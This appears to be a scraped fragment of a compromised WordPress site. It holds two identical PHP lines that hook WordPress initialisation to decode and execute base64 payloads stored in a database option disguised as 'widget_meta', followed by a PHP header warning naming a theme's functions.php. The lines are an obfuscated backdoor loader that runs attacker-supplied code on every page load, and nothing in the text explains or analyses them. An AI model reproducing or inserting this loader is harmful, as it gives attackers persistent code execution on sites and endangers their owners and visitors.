add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
Warning: Cannot modify header information - headers already sent by (output started at /homepages/40/d140488022/htdocs/wordpress/wp-content/themes/nova/functions.php:66) in /homepages/40/d140488022/htdocs/wordpress/wp-includes/pluggable.php on line 1185